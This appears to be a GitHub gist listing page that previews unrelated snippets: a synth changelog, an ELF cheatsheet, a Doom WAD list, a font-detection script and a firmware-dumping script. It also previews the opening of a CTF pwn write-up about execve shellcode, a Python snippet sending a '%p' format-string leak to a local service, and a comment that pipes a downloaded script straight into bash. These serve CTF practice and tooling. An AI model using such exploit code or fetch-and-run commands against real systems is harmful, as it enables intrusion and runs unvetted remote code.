Skip to content

Instantly share code, notes, and snippets.

View jrelo's full-sized avatar

hed0rah jrelo

View GitHub Profile
@0xdevalias
0xdevalias / serum-changelog.md
Last active March 20, 2025 21:40
Xfer Records - Serum - Changelog / Release Notes

Xfer Records - Serum - Changelog / Release Notes

Note: This was originally extracted from the HTML returned from the https://xferrecords.com/api/update_check/serum API, converted to markdown, and then the formatted manually cleaned up a bit further. It probably won't be kept strictly up to date, but it should at least serve as a useful historical record.

Note: For releases that I had access to the *.exe/*.dmg files for, I have also included the SHA256 hashes of the official downloads; so that they can be used to verify the authenticity of any versions that you might come across. At time of writing, the first version below that includes the hashes is 1.36b8 (October 11 2023)

@x0nu11byt3
x0nu11byt3 / elf_format_cheatsheet.md
Created February 27, 2021 05:26
ELF Format Cheatsheet

ELF Format Cheatsheet

Introduction

Executable and Linkable Format (ELF), is the default binary format on Linux-based systems.

ELF

Compilation

@x0nu11byt3
x0nu11byt3 / harekaze_mini_ctf_2020.md
Created February 27, 2021 05:24 — forked from farazsth98/harekaze_mini_ctf_2020.md
Harekaze mini CTF 2020

I played Harekaze Mini CTF 2020 for about 3 hours this weekend. The pwn challenges were nice (I especially enjoyed nm-game-extreme). Here are some short writeups.

shellcode

The program just tells you to provide shellcode that will execute execve("/bin/sh", NULL, NULL). It gives you the address of the "/bin/sh" string, so you just create shellcode to do the job and send it:

#!/usr/bin/env python3

from pwn import *
@babywyrm
babywyrm / gist:0100e8eb8c14bfc46edf7e927d1af483
Created September 29, 2020 14:28
big_huge_cheatsheet_arch_of_the_coveneant__
###########################################################
## https://www.reddit.com/r/cybersecurity/comments/iu17uu/cybersec_cheat_sheets_in_all_flavors_huge_list/
###########################################################
Posted byu/HeyGuyGuyGuy
12 days ago
Cybersec Cheat Sheets in all Flavors! (Huge List Inside)
"UGH! Whats the command to [insert function here]?"
###########################################################
@LiveOverflow
LiveOverflow / asd.py
Last active October 14, 2024 23:18
C Application Firewall
import struct
import socket
s = socket.socket()
s.connect(('127.0.0.1', 1337))
r = s.recv(1024)
s.send("%p,%p,%p\n")
while ',' not in r:
r = s.recv(1024)
start_buf = int(r.split(',')[1], 16)-9
@matthewmayer
matthewmayer / whatthefont.js
Last active July 10, 2020 13:30
paste this into Javascript console to see what fonts are being used
function walk(node) {
// I stole this function from here:
// http://is.gd/mwZp7E
var child, next;
var tagName = node.tagName ? node.tagName.toLowerCase() : "";
if (tagName == 'input' || tagName == 'textarea') {
return;
}
@0x4D31
0x4D31 / libssh_server_fingerprints.md
Last active September 17, 2024 00:33
[libssh server fingerprints] An analysis of Censys Public Scan 20180807 (only port 22) to estimate the number of servers {potentially} vulnerable to the recent Libssh bug #libssh #hassh
@Danjb1
Danjb1 / wadlist.md
Last active September 21, 2024 04:55
Doom WAD List

Doom WAD List

Official

IWADs

  • The Ultimate Doom
  • Doom II
  • Final Doom - The Plutonia Experiment
  • Final Doom - TNT: Evilution
@cryptolok
cryptolok / FirmAD.sh
Created February 28, 2018 00:24
Firmware Automatic Dumping & Extraction Tool
#!/bin/bash
# this tool will automate firmware extraction and unpacking using FT232R-type adaptors (like BusPirate) and a SOIC clip placed on a chip to dump
# install the necessary software:
#$ sudo apt install flashrom binwalk || echo 'git clone?'
# pump up binwalk with additional packages and libraries
#$ bash <(curl -s https://raw.githubusercontent.com/devttys0/binwalk/master/deps.sh)
# place the clip on the chip, connect it to the adaptor, which sould be connected to your PC (with drivers installed) and launch the script:
# chip => clip => adaptor => PC => script